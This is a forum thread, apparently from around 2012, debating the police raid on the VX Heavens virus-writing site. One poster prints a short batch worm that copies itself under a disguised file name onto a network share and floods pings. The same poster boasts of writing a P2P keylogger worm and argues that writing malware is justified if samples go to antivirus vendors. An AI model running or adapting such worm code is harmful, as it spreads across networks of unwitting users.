VX Heavens raided by police

Guest BlairWitch

Guest BlairWitch

VX Heavens, old-school virus-writing website, raided by police

"A website beloved by old-school virus writers has been raided and closed down by the Ukrainian police."

http://nakedsecurity.sophos.com/2012/03/28/vx-heavens-virus-writing-website-raided/

I dont see any point in this thing. It's just injustice. The site was only for research purposes and education. It was not for purpose of any money making or profit. It was nothing like some groups like lulzsec and all those criminal groups trying to make money with malware by making fake av programs. I think that the site have offered lot's of help to the av industry and i think that all the charges should be dropped.

Guest BlairWitch

I mean the malwares are being shared by malware companies and the users of different av softwares so this is a nonsense. It only makes it harder for av companies to detect new malwares if this kind of sites are taken offline.

Guest BlairWitch

@echo off

copy %0 c:\shared\sex.mpg.bat

net share sex=c:\shared

ping www.blaablaablaa.com -t

net send * "Hello there is a worm in your network!"

Lol does that make me a criminal? Then this site should be banned http://www.computerhope.com/nethlp.htm

:mellow:

Lol even Symantec says that cyber crime is mostly money making http://us.norton.com.../definition.jsp

I dont see much money making in sites dedicating to sharing information and researching security flaws the real problem is the people who really make money with malware. Many sites that shares malware samples and security research information are only helping the av industry so should they be prosecuted i think that they should not be prosecuted so i recommend that the charges against vxheavens will be dropped why prosecute security researchers? I mean the vxheavens site have provided the av industry with much information so that they can add heuristic technigues to their applications to stop viruses so it's not fair to start prosecuting them or any other independent security and malware research site that is assisting av companies and does not seek money and voluntarily spread malicious files exept for educational purposes and to help the av companies. I mean that maybe it's time to realize how much these independent virus research sites have helped the av industry by sending them samples and information before the real criminals after money have had the change to exploit many of the virus technigues.

Guest BlairWitch

What should be clear is that the independent security researchers like me who write malware not to spread them but only to send them to av companies are only helping the av companies for example when i wrote this one keylogger for educational and security purposes it's a keylogger worm spreading through p2p i did not spread it i only send it to av companies to add in their definitions before someone else could have used it in a malicious way. First it was detected by one scanner in virustotal but now allmost every scanner detects it. So in my opinion i just saved some people from getting a keylogger that would have stealed their passwords. If someone with malicious intentions would have made that before me then many peoples would had lost their personal information and do i even get paid for this? Well no...

keylogger.jpg

Welcome to Earth. Now please have a seat while our governments issue you an ID card, process your fingerprints and retinal scan, and log the IP addresses of your computers/phones/etc. so that you can be tracked at all times and that we can verify that you do not do anything that the state does not approve of. It's all for your safety, of course. :P

VX Heavens, old-school virus-writing website, raided by police

"A website beloved by old-school virus writers has been raided and closed down by the Ukrainian police."

http://nakedsecurity...website-raided/

Taken straight from the article:

"The site prided itself on sharing virus-writing tutorials, malicious code samples and articles for those interested in creating computer malware."

I personally have never been to the site, but I am going to have to assume that might have something to do with it :mellow:

Taken straight from the article:

"The site prided itself on sharing virus-writing tutorials, malicious code samples and articles for those interested in creating computer malware."

I personally have never been to the site, but I am going to have to assume that might have something to do with it :mellow:

That's what my thought was. Sharing any public way to write malware is never a good thing. It should be a paid service only for those that have a degree in Information Technology, CompTIA Security+ Certificate and a clean criminal history in my opinion.

Welcome to Earth. Now please have a seat while our governments issue you an ID card, process your fingerprints and retinal scan, and log the IP addresses of your computers/phones/etc. so that you can be tracked at all times and that we can verify that you do not do anything that the state does not approve of. It's all for your safety, of course. :P

;)

That sounds about right.